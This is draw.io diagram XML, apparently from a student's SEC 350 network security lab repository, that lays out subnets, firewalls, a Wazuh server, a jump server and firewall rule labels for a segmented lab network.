<mxCell id="r5Bo3zyKJavz-clfbByA-19" value="" style="endArrow=none;html=1;rounded=0;exitX=0;exitY=0.5;exitDx=0;exitDy=0;entryX=1.006;entryY=0.471;entryDx=0;entryDy=0;entryPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-1" target="r5Bo3zyKJavz-clfbByA-16">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="570" y="440" as="sourcePoint" />
<mxPoint x="410" y="380" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-20" value="" style="endArrow=none;html=1;rounded=0;entryX=1;entryY=0.965;entryDx=0;entryDy=0;entryPerimeter=0;exitX=0.49;exitY=-0.035;exitDx=0;exitDy=0;exitPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-1" target="r5Bo3zyKJavz-clfbByA-13">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="600" y="310" as="sourcePoint" />
<mxPoint x="650" y="260" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-21" value="10.0.17.2" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];" vertex="1" connectable="0" parent="r5Bo3zyKJavz-clfbByA-20">
<mxGeometry x="0.7364" y="-1" relative="1" as="geometry">
<mxPoint x="8" y="8" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-23" value="MGMT 172.16.2000.0/28" style="rounded=1;whiteSpace=wrap;html=1;align=center;" vertex="1" parent="1">
<mxGeometry x="782" y="970" width="340" height="40" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-24" value="" style="endArrow=none;html=1;rounded=0;fontSize=12;startSize=8;endSize=8;curved=1;entryX=0.121;entryY=1.05;entryDx=0;entryDy=0;entryPerimeter=0;exitX=0.5;exitY=0;exitDx=0;exitDy=0;exitPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-49" target="r5Bo3zyKJavz-clfbByA-2">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="846" y="800" as="sourcePoint" />
<mxPoint x="1034" y="830" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-25" value="&lt;div&gt;172.16.150.3&lt;/div&gt;eth0" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];fontSize=12;" vertex="1" connectable="0" parent="r5Bo3zyKJavz-clfbByA-24">
<mxGeometry x="-0.5172" y="-1" relative="1" as="geometry">
<mxPoint as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-26" value="" style="endArrow=none;html=1;rounded=0;fontSize=12;startSize=8;endSize=8;curved=1;exitX=0.5;exitY=1;exitDx=0;exitDy=0;exitPerimeter=0;entryX=0.103;entryY=0.05;entryDx=0;entryDy=0;entryPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-49" target="r5Bo3zyKJavz-clfbByA-23">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="984" y="880" as="sourcePoint" />
<mxPoint x="1034" y="830" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-27" value="172.16.200.2&lt;div&gt;eth1&lt;/div&gt;" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];fontSize=12;" vertex="1" connectable="0" parent="r5Bo3zyKJavz-clfbByA-26">
<mxGeometry x="-0.2728" y="1" relative="1" as="geometry">
<mxPoint x="-1" y="8" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-28" value="wazuh&lt;div&gt;172.16.200.10&lt;/div&gt;" style="shape=image;html=1;verticalAlign=top;verticalLabelPosition=bottom;labelBackgroundColor=#ffffff;imageAspect=0;aspect=fixed;image=https://cdn1.iconfinder.com/data/icons/logos-brands-1/24/logo_brand_brands_logos_ubuntu-128.png" vertex="1" parent="1">
<mxGeometry x="782" y="1070" width="60" height="60" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-29" value="MGMT02&lt;div&gt;172.16.200.11&lt;/div&gt;" style="sketch=0;aspect=fixed;pointerEvents=1;shadow=0;dashed=0;html=1;strokeColor=none;labelPosition=center;verticalLabelPosition=bottom;verticalAlign=top;align=center;fillColor=#00188D;shape=mxgraph.mscae.enterprise.windows_server" vertex="1" parent="1">
<mxGeometry x="940" y="1070" width="39" height="50" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-30" value="" style="endArrow=none;html=1;rounded=0;fontSize=12;startSize=8;endSize=8;curved=1;entryX=0.5;entryY=1;entryDx=0;entryDy=0;exitX=0.308;exitY=0.12;exitDx=0;exitDy=0;exitPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-29" target="r5Bo3zyKJavz-clfbByA-23">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="984" y="1000" as="sourcePoint" />
<mxPoint x="1034" y="950" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-31" value="" style="endArrow=none;html=1;rounded=0;fontSize=12;startSize=8;endSize=8;curved=1;entryX=0.107;entryY=1.038;entryDx=0;entryDy=0;entryPerimeter=0;exitX=0.5;exitY=0;exitDx=0;exitDy=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-28" target="r5Bo3zyKJavz-clfbByA-23">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="984" y="1000" as="sourcePoint" />
<mxPoint x="1034" y="950" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-32" value="&lt;div&gt;ANY &amp;gt; 172.16.50.3:80&lt;/div&gt;&lt;div&gt;172.16.150.10:22 &amp;gt; ANY:22&lt;/div&gt;" style="shape=flexArrow;endArrow=classic;html=1;rounded=0;endSize=15.103448275862068;strokeWidth=1;sourcePerimeterSpacing=0;startSize=6;width=34.48275862068966;" edge="1" parent="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="720" y="640" as="sourcePoint" />
<mxPoint x="540" y="640" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-33" value="ANY &gt; 172.16.200.10:1514,1515" style="shape=flexArrow;endArrow=classic;rounded=0;width=24.137931034482758;endSize=9.379310344827585;" edge="1" parent="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="550" y="680" as="sourcePoint" />
<mxPoint x="740" y="680" as="targetPoint" />
<mxPoint as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-34" value="ANY:80 &gt; 172.16.50.3:80" style="shape=flexArrow;endArrow=classic;rounded=0;endSize=11.33;strokeWidth=1;sourcePerimeterSpacing=0;startSize=6;width=28;horizontal=1;labelBackgroundColor=default;" edge="1" parent="1">
<mxGeometry x="-0.1119" y="-8" width="50" height="50" relative="1" as="geometry">
<mxPoint x="575" y="441.6" as="sourcePoint" />
<mxPoint x="489" y="561.6" as="targetPoint" />
<mxPoint as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-35" value="&lt;div&gt;ANY &amp;gt; ANY&lt;/div&gt;&lt;div&gt;No restrictions&lt;br&gt;&lt;/div&gt;" style="shape=flexArrow;endArrow=classic;html=1;rounded=0;endSize=15.019354838709678;strokeWidth=1;sourcePerimeterSpacing=0;startSize=6;width=20;" edge="1" parent="1">
<mxGeometry x="-0.2319" width="50" height="50" relative="1" as="geometry">
<mxPoint x="910" y="580" as="sourcePoint" />
<mxPoint x="883" y="450" as="targetPoint" />
<mxPoint as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-36" value="FW01 default policy:&#xa;DROP with logging&#xa;Established connections allowed " style="rounded=0;whiteSpace=wrap;fontSize=10;verticalAlign=middle;" vertex="1" parent="1">
<mxGeometry x="700" y="480" width="151" height="70" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-37" value="" style="endArrow=none;html=1;rounded=0;entryX=0;entryY=0.5;entryDx=0;entryDy=0;exitX=1;exitY=0.5;exitDx=0;exitDy=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="730" y="490" as="sourcePoint" />
<mxPoint x="950" y="390" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-38" value="FW-MGMT default policy:&#xa;DROP with logging&#xa;Established connections allowed " style="rounded=0;whiteSpace=wrap;fontSize=10;verticalAlign=middle;" vertex="1" parent="1">
<mxGeometry x="631" y="790" width="151" height="70" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-39" value="" style="shape=flexArrow;endArrow=classic;html=1;rounded=0;width=19.25925925925926;endSize=11.2;" edge="1" parent="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="940" y="680" as="sourcePoint" />
<mxPoint x="950" y="846" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-40" value="&lt;div&gt;172.16.150.10:22 &amp;gt; 172.16.200.10:22&lt;br&gt;&lt;/div&gt;&lt;div&gt;172.16.150.10:443 &amp;gt; 172.16.200.10:443&lt;/div&gt;ANY &amp;gt; 172.16.200.10:1514,1515" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];" vertex="1" connectable="0" parent="r5Bo3zyKJavz-clfbByA-39">
<mxGeometry x="-0.1287" y="2" relative="1" as="geometry">
<mxPoint x="24" y="-2" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-41" value="" style="shape=flexArrow;endArrow=classic;html=1;rounded=0;width=13.793103448275863;endSize=7.63448275862069;" edge="1" parent="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="920" y="950" as="sourcePoint" />
<mxPoint x="900" y="790" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-42" value="&lt;div&gt;ANY &amp;gt; 172.16.150.0/24&lt;/div&gt;&lt;div&gt;ANY &amp;gt; 172.16.50.0/29&lt;br&gt;&lt;/div&gt;" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];" vertex="1" connectable="0" parent="r5Bo3zyKJavz-clfbByA-41">
<mxGeometry x="-0.0417" y="-7" relative="1" as="geometry">
<mxPoint x="23" y="18" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-43" value="&lt;div&gt;&lt;br&gt;&lt;/div&gt;" style="shape=umlActor;verticalLabelPosition=bottom;verticalAlign=top;html=1;outlineConnect=0;" vertex="1" parent="1">
<mxGeometry x="1115" y="200" width="50" height="80" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-44" value="" style="endArrow=none;html=1;rounded=0;exitX=0.612;exitY=-0.033;exitDx=0;exitDy=0;exitPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-2" target="r5Bo3zyKJavz-clfbByA-50">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="970" y="590" as="sourcePoint" />
<mxPoint x="1020" y="540" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-45" value="" style="endArrow=none;html=1;rounded=0;exitX=0.882;exitY=-0.005;exitDx=0;exitDy=0;exitPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-2" target="r5Bo3zyKJavz-clfbByA-51">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="1020" y="570" as="sourcePoint" />
<mxPoint x="1070" y="520" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-46" value="" style="endArrow=none;html=1;rounded=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-48" target="r5Bo3zyKJavz-clfbByA-43">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="1090" y="430" as="sourcePoint" />
<mxPoint x="1140" y="380" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-47" value="" style="endArrow=none;html=1;rounded=0;entryX=0.5;entryY=0;entryDx=0;entryDy=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-48" target="r5Bo3zyKJavz-clfbByA-51">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="1090" y="430" as="sourcePoint" />
<mxPoint x="1140" y="380" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-48" value="&lt;div&gt;Access via&lt;/div&gt;&lt;div&gt;Chrome Remote Desktop&lt;br&gt;&lt;/div&gt;" style="dashed=0;outlineConnect=0;html=1;align=center;labelPosition=center;verticalLabelPosition=bottom;verticalAlign=top;shape=mxgraph.weblogos.chrome;labelBackgroundColor=default;" vertex="1" parent="1">
<mxGeometry x="1110" y="364" width="60" height="60" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-49" value="&lt;span&gt;FW-MGMT&lt;/span&gt;" style="outlineConnect=0;dashed=0;verticalLabelPosition=bottom;verticalAlign=top;align=center;html=1;shape=mxgraph.aws3.router;fillColor=#F58534;gradientColor=none;labelBackgroundColor=#FFFFFF;" vertex="1" parent="1">
<mxGeometry x="782" y="753" width="69" height="72" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-50" value="wks01&lt;div&gt;172.16.150.50&lt;/div&gt;" style="image;sketch=0;aspect=fixed;html=1;points=[];align=center;fontSize=12;image=img/lib/mscae/VirtualMachineWindows.svg;" vertex="1" parent="1">
<mxGeometry x="980" y="515.6" width="50" height="46" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-51" value="mgmt01&lt;div&gt;172.16.150.10&lt;/div&gt;" style="shape=image;html=1;verticalAlign=top;verticalLabelPosition=bottom;labelBackgroundColor=#ffffff;imageAspect=0;aspect=fixed;image=https://cdn1.iconfinder.com/data/icons/operating-system-flat-1/30/ubuntu-128.png" vertex="1" parent="1">
<mxGeometry x="1080" y="502.6" width="70" height="70" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-52" value="&lt;div&gt;&lt;font style=&quot;font-size: 18px;&quot;&gt;SEC 350 -&amp;nbsp; Network Security Controls&lt;/font&gt;&lt;/div&gt;&lt;div&gt;&lt;font style=&quot;&quot;&gt;&lt;font style=&quot;font-size: 18px;&quot;&gt;Network Diagram - Charlotte Croce&lt;/font&gt;&lt;font style=&quot;font-size: 16px;&quot;&gt;&lt;br&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;&lt;div&gt;&lt;font style=&quot;&quot;&gt;&lt;font style=&quot;font-size: 18px;&quot;&gt;MIDTERM AND AFTER&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;" style="rounded=0;whiteSpace=wrap;html=1;" vertex="1" parent="1">
<mxGeometry x="654" y="130" width="356" height="100" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-53" value="" style="shape=image;verticalLabelPosition=bottom;labelBackgroundColor=default;verticalAlign=top;aspect=fixed;imageAspect=0;image=https://wazuh.com/uploads/2022/05/wazuh-logo.png;" vertex="1" parent="1">
<mxGeometry x="820.66" y="1040" width="89.68" height="30" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-56" value="access via vSphere" style="shape=image;verticalLabelPosition=bottom;labelBackgroundColor=default;verticalAlign=top;aspect=fixed;imageAspect=0;image=https://raw.githubusercontent.com/pulumiverse/pulumi-esxi-native/main/docs/esxi-logo.png;clipPath=inset(3% 4.33% 5% 2%);" vertex="1" parent="1">
<mxGeometry x="320" y="215.71" width="69.82" height="68.58" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-57" value="" style="endArrow=none;html=1;rounded=0;entryX=0;entryY=1;entryDx=0;entryDy=0;exitX=1;exitY=0.5;exitDx=0;exitDy=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-56" target="r5Bo3zyKJavz-clfbByA-13">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="490" y="330" as="sourcePoint" />
<mxPoint x="540" y="280" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-58" value="" style="endArrow=none;html=1;rounded=0;entryX=0.75;entryY=1;entryDx=0;entryDy=0;exitX=0.5;exitY=0;exitDx=0;exitDy=0;exitPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-9" target="r5Bo3zyKJavz-clfbByA-3">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="470" y="700" as="sourcePoint" />
<mxPoint x="520" y="650" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-59" value="Text" style="text;strokeColor=none;align=center;fillColor=none;html=1;verticalAlign=middle;whiteSpace=wrap;rounded=0;" vertex="1" parent="1">
<mxGeometry x="570" y="500" width="60" height="30" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-62" value="" style="endArrow=classic;html=1;rounded=0;dashed=1;" edge="1" parent="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="340" y="880" as="sourcePoint" />
<mxPoint x="770" y="1080" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-63" value="" style="endArrow=classic;html=1;rounded=0;" edge="1" parent="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="640" y="490" as="sourcePoint" />
<mxPoint x="580" y="470" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-64" value="&lt;font style=&quot;font-size: 8px;&quot;&gt;PF :80&lt;/font&gt;" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];" vertex="1" connectable="0" parent="r5Bo3zyKJavz-clfbByA-63">
<mxGeometry x="0.0469" y="3" relative="1" as="geometry">
<mxPoint x="2" y="-2" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-65" value="NGINX01" style="shape=image;html=1;verticalAlign=top;verticalLabelPosition=bottom;labelBackgroundColor=#ffffff;imageAspect=0;aspect=fixed;image=https://cdn1.iconfinder.com/data/icons/operating-system-flat-1/30/ubuntu-128.png;clipPath=inset(10.94% 10.94% 10.94% 10.94%);" vertex="1" parent="1">
<mxGeometry x="185" y="693" width="60" height="60" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-66" value="TRAVELER" style="image;sketch=0;aspect=fixed;html=1;points=[];align=center;fontSize=12;image=img/lib/mscae/VirtualMachineWindows.svg;" vertex="1" parent="1">
<mxGeometry x="950" y="360" width="50" height="46" as="geometry" />
</mxCell>
</root>
</mxGraphModel>
</diagram>
</mxfile>

306
net-sec-controls-sec350/diagrams/SEC350_network-diagram-beforemidterm.drawio Normal file
View file

@ -0,0 +1,306 @@
<mxfile host="app.diagrams.net" agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36" version="26.1.1">
<diagram name="Page-1" id="vxOPZugNCJ2shPD0R46R">
<mxGraphModel dx="1750" dy="952" grid="1" gridSize="10" guides="1" tooltips="1" connect="1" arrows="1" fold="1" page="1" pageScale="1" pageWidth="550" pageHeight="1100" math="0" shadow="0">
<root>
<mxCell id="0" />
<mxCell id="1" parent="0" />
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-5" value="SEC-350 WAN 10.0.17.0/24" style="rounded=1;whiteSpace=wrap;html=1;align=center;" parent="1" vertex="1">
<mxGeometry x="560" y="380" width="340" height="40" as="geometry" />
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-7" value="LAN 172.16.150.0/24" style="rounded=1;whiteSpace=wrap;html=1;align=center;" parent="1" vertex="1">
<mxGeometry x="770" y="620" width="340" height="40" as="geometry" />
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-8" value="DMZ 172.16.50.0/29" style="rounded=1;whiteSpace=wrap;html=1;align=center;" parent="1" vertex="1">
<mxGeometry x="160" y="610" width="340" height="40" as="geometry" />
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-9" value="FW01" style="outlineConnect=0;dashed=0;verticalLabelPosition=bottom;verticalAlign=top;align=center;html=1;shape=mxgraph.aws3.router;fillColor=#F58534;gradientColor=none;" parent="1" vertex="1">
<mxGeometry x="610" y="502.6" width="69" height="72" as="geometry" />
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-10" value="" style="endArrow=none;html=1;rounded=0;entryX=0.855;entryY=0.855;entryDx=0;entryDy=0;entryPerimeter=0;exitX=0.104;exitY=0;exitDx=0;exitDy=0;exitPerimeter=0;" parent="1" source="WV4KZU-K2HEF4Ivt-XvY-7" target="WV4KZU-K2HEF4Ivt-XvY-9" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="921" y="710" as="sourcePoint" />
<mxPoint x="971" y="660" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-12" value="172.16.150.2&lt;div&gt;eth2&lt;/div&gt;" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];rotation=0;" parent="WV4KZU-K2HEF4Ivt-XvY-10" vertex="1" connectable="0">
<mxGeometry x="0.002" y="2" relative="1" as="geometry">
<mxPoint x="-6" y="-14" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-15" value="" style="endArrow=none;html=1;rounded=0;entryX=0.145;entryY=0.855;entryDx=0;entryDy=0;entryPerimeter=0;exitX=0.829;exitY=-0.05;exitDx=0;exitDy=0;exitPerimeter=0;" parent="1" source="WV4KZU-K2HEF4Ivt-XvY-8" target="WV4KZU-K2HEF4Ivt-XvY-9" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="491" y="560" as="sourcePoint" />
<mxPoint x="541" y="510" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-16" value="172.16.50.2&lt;div&gt;eth1&lt;/div&gt;" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];rotation=0;" parent="WV4KZU-K2HEF4Ivt-XvY-15" vertex="1" connectable="0">
<mxGeometry x="0.4" y="-1" relative="1" as="geometry">
<mxPoint x="-17" y="6" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-18" value="LOG01 (DECOMMISSIONED,&amp;nbsp;&lt;div&gt;THEN RECOMMISSIONED AS A&amp;nbsp;&lt;/div&gt;&lt;div&gt;JUMP SERVER)&lt;br&gt;&lt;div&gt;172.16.50.5&lt;/div&gt;&lt;/div&gt;" style="outlineConnect=0;dashed=0;verticalLabelPosition=bottom;verticalAlign=top;align=center;html=1;shape=mxgraph.aws3.traditional_server;fillColor=#7D7C7C;gradientColor=none;" parent="1" vertex="1">
<mxGeometry x="420" y="690" width="35.5" height="53" as="geometry" />
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-21" value="" style="endArrow=none;html=1;rounded=0;entryX=0.5;entryY=0;entryDx=0;entryDy=0;exitX=0.153;exitY=0.975;exitDx=0;exitDy=0;exitPerimeter=0;" parent="1" source="WV4KZU-K2HEF4Ivt-XvY-8" target="8yr2mNF9FMK26sW0gYA2-46" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="481" y="850" as="sourcePoint" />
<mxPoint x="213.25" y="690" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-23" value="" style="endArrow=none;html=1;rounded=0;entryX=0.5;entryY=0;entryDx=0;entryDy=0;entryPerimeter=0;exitX=0.432;exitY=1.047;exitDx=0;exitDy=0;exitPerimeter=0;" parent="1" source="WV4KZU-K2HEF4Ivt-XvY-5" target="WV4KZU-K2HEF4Ivt-XvY-9" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="805" y="530" as="sourcePoint" />
<mxPoint x="855" y="480" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="6gv1575Ye6TbEdJx1Vt9-2" value="10.0.17.151&lt;div&gt;eth0&lt;/div&gt;" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];" parent="WV4KZU-K2HEF4Ivt-XvY-23" vertex="1" connectable="0">
<mxGeometry x="0.4517" y="1" relative="1" as="geometry">
<mxPoint as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-25" value="esxi02-fw1" style="image;html=1;image=img/lib/clip_art/networking/Firewall_02_128x128.png" parent="1" vertex="1">
<mxGeometry x="466.01" y="170" width="80" height="80" as="geometry" />
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-26" value="&lt;div&gt;&lt;br&gt;&lt;/div&gt;" style="shape=umlActor;verticalLabelPosition=bottom;verticalAlign=top;html=1;outlineConnect=0;" parent="1" vertex="1">
<mxGeometry x="190" y="210" width="50" height="80" as="geometry" />
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-27" value="" style="endArrow=none;html=1;rounded=0;exitX=0;exitY=0.5;exitDx=0;exitDy=0;" parent="1" source="8yr2mNF9FMK26sW0gYA2-48" target="WV4KZU-K2HEF4Ivt-XvY-26" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="460" y="390" as="sourcePoint" />
<mxPoint x="510" y="340" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-29" value="sec350.cyber.local&lt;div&gt;10.0.17.100&lt;/div&gt;" style="image;points=[];aspect=fixed;html=1;align=center;shadow=0;dashed=0;image=img/lib/allied_telesis/computer_and_terminals/Server_Desktop.svg;" parent="1" vertex="1">
<mxGeometry x="443.99" y="364" width="56.01" height="71" as="geometry" />
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-30" value="" style="endArrow=none;html=1;rounded=0;entryX=0;entryY=1;entryDx=0;entryDy=0;exitX=0.417;exitY=0.031;exitDx=0;exitDy=0;exitPerimeter=0;" parent="1" source="WV4KZU-K2HEF4Ivt-XvY-29" target="WV4KZU-K2HEF4Ivt-XvY-25" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="620" y="470" as="sourcePoint" />
<mxPoint x="670" y="420" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-31" value="port forwarding" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];rotation=90;" parent="WV4KZU-K2HEF4Ivt-XvY-30" vertex="1" connectable="0">
<mxGeometry x="-0.27" y="1" relative="1" as="geometry">
<mxPoint x="-7" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-32" value="" style="endArrow=none;html=1;rounded=0;exitX=0;exitY=0.5;exitDx=0;exitDy=0;entryX=1.006;entryY=0.471;entryDx=0;entryDy=0;entryPerimeter=0;" parent="1" source="WV4KZU-K2HEF4Ivt-XvY-5" target="WV4KZU-K2HEF4Ivt-XvY-29" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="570" y="440" as="sourcePoint" />
<mxPoint x="410" y="380" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-33" value="" style="endArrow=none;html=1;rounded=0;entryX=1;entryY=0.965;entryDx=0;entryDy=0;entryPerimeter=0;exitX=0.49;exitY=-0.035;exitDx=0;exitDy=0;exitPerimeter=0;" parent="1" source="WV4KZU-K2HEF4Ivt-XvY-5" target="WV4KZU-K2HEF4Ivt-XvY-25" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="600" y="310" as="sourcePoint" />
<mxPoint x="650" y="260" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="WV4KZU-K2HEF4Ivt-XvY-34" value="10.0.17.2" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];" parent="WV4KZU-K2HEF4Ivt-XvY-33" vertex="1" connectable="0">
<mxGeometry x="0.7364" y="-1" relative="1" as="geometry">
<mxPoint x="8" y="8" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="JkLcdCIDIRtKrtIc7PYW-1" value="RW01&lt;div&gt;10.0.17.51&lt;/div&gt;" style="shape=image;html=1;verticalAlign=top;verticalLabelPosition=bottom;labelBackgroundColor=#ffffff;imageAspect=0;aspect=fixed;image=https://cdn1.iconfinder.com/data/icons/operating-system-flat-1/30/ubuntu-128.png;clipPath=inset(10.94% 10.94% 10.94% 10.94%);" parent="1" vertex="1">
<mxGeometry x="950" y="360" width="60" height="60" as="geometry" />
</mxCell>
